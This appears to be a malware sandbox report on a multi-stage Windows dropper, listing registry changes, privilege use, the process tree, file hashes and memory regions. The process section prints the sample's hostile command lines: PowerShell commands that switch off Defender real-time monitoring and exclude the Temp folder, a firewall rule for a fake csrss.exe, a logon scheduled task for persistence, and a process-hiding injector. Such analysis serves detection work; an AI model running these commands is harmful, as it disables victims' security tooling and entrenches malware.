Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\rss\csrss.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10d7483856.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 640 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4708 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe
PID 4100 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1248 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4100 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 3644 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe

"C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a0affb29d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10b607271059cb7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10fa57e769925f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed103b2f384c2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10d7483856.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1095e8d3cef4ec773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1001440e7e09.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed109189c07b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10eb606bd1d021d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a80f141fb08.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10799545d143108.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10520e75c2eb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe

Wed1095e8d3cef4ec773.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe

Wed10eb606bd1d021d.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe

Wed10b607271059cb7.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10d7483856.exe

Wed10d7483856.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a80f141fb08.exe

Wed10a80f141fb08.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe

Wed10a0affb29d.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe

Wed10fa57e769925f6.exe

C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp" /SL5="$40216,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe"

C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp" /SL5="$60028,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3388 -ip 3388

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe

"C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe" -u

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe

"C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 468

C:\Users\Admin\AppData\Local\Temp\is-QUT4G.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QUT4G.tmp\Wed10fa57e769925f6.tmp" /SL5="$A0232,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe

"C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4328 -ip 4328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2016

Network


Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 532d84cb3e0928c7bedc0a89611837da
SHA1 b7dec859275a299e9c95833be01b055b2f9b91d7
SHA256 9aca2b6f263e24f8161def69b0e8a3a8dbc60bf46ee75714531e7ca09e4e9616
SHA512 c80f46401569b3c20eeeb7225f688e99dc94a70a8caf7200141069c3b43c8df7d4b9846174a22e05a50bd775ebe7342f1f0774b3cf1213f3535ee936e7d85366

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe

MD5 b6140096778ba8327684188903b829f9
SHA1 a8c542ed9b1c29d07cc5c955ef29f3f92531887c
SHA256 32096a36f4ce1bfed14e19eedfd6b882e997c38241a182142332a2bf4c9dbb64
SHA512 7f8fa614fae4aa6622d28f228f5b39a90ebf66f598acb06bbc2a219aeab6a1409393dcd82a03b60e418671c66f9c3da9510fdea9a3aa19716daf9385925f0c6f

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/4100-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4100-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-79-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4100-78-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4100-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4100-76-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4100-75-0x0000000064941000-0x000000006494F000-memory.dmp

memory/4100-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/4100-71-0x0000000000F40000-0x0000000000FCF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/4100-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-86-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4100-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4100-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe

MD5 d60755a29f9dc368fe71fbadf96b640c
SHA1 d3ac47604f6d91cbc76d9013ba9b3c779f69ad27
SHA256 1129ef957be36f46c5ba500a3f48a237069006b699d570360f876f6c186a7606
SHA512 7dadfa4c0401e688ef0ab6f2c5b175f4943243bd97c4310f0f0bbb9fd7f096e80993ea4e9d598109ee6d0436ff2331d485966c831054960cf62ce97b58102c8a

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10520e75c2eb.exe

MD5 18c977c8af2d6a4491109f686b8430ec
SHA1 4265fe935115de077d22f3279b1cf5626a28a623
SHA256 cec7c81038db8fe58fb50abd445d9b48d7b0d575a5c934f7a7d5c53a0be8a0ac
SHA512 4a56c2356b7c41fc9dbd36e02f103f9938d0fe221dd5149705f9ea58e53af6d8da58e1216a77ff792c8ead8aca7a1c052c8d204435e7f4364e3e4cd5b9d54f72

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1015ba90d2.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

memory/4100-111-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4100-110-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4996-112-0x00000000050C0000-0x00000000050F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe

MD5 0426dbe3753b2d07d3612fceb824a182
SHA1 4f28da2d30710389cabf10385cb8dc5cbf4be74a
SHA256 6fbe7d2d78413b54c593100e706e727f771714e2fa1b584bdc57836b1bd44d60
SHA512 f6aa58bbfd5f976a76da7b12d60d63326d6d78996cb849e0d4075a7f1ea6ce9eb69d90ec5c68e27de9ab4ec4625090a575f2e3b56ff7e28463fabcaa076c4ddd

memory/4996-114-0x0000000005850000-0x0000000005E78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

memory/2840-124-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/932-128-0x0000000005360000-0x0000000005382000-memory.dmp

memory/3988-141-0x0000000000DF0000-0x0000000000DF6000-memory.dmp

memory/3988-156-0x000000001B0D0000-0x000000001B100000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp

MD5 ed5b2c2bf689ca52e9b53f6bc2195c63
SHA1 f61d31d176ba67cfff4f0cab04b4b2d19df91684
SHA256 4feb70ee4d54dd933dfa3a8d0461dc428484489e8a34b905276a799e0bf9220f
SHA512 b8c6e7b16fd13ca570cabd6ea29f33ba90e7318f7076862257f18f6a22695d92d608ca5e5c3d99034757b4e5b7167d4586b922eebf0e090f78df67651bde5179

C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/932-143-0x0000000005E30000-0x0000000006184000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zclzbp2b.tqr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/932-130-0x0000000005570000-0x00000000055D6000-memory.dmp

memory/932-129-0x0000000005500000-0x0000000005566000-memory.dmp

memory/3988-127-0x0000000000610000-0x0000000000652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a80f141fb08.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

memory/2836-119-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10d7483856.exe

MD5 6d8ff7889acdcfd9f785e073e6ab4f4d
SHA1 5a878803d1c355fae35d684f59f26c1b4a838e6c
SHA256 8e50b8cdea9a829fe00a3d81bad328f6f76581d20ba9cc8cf6d8642d0aa882c7
SHA512 fcb23c40e31839402927dc1cdecf750d4c32c609f42337741f400069c8763599ad6604ed9d7fd86d7d6ee7d6f7b4eca7d132ceb5796f2dad99223e619897b3ab

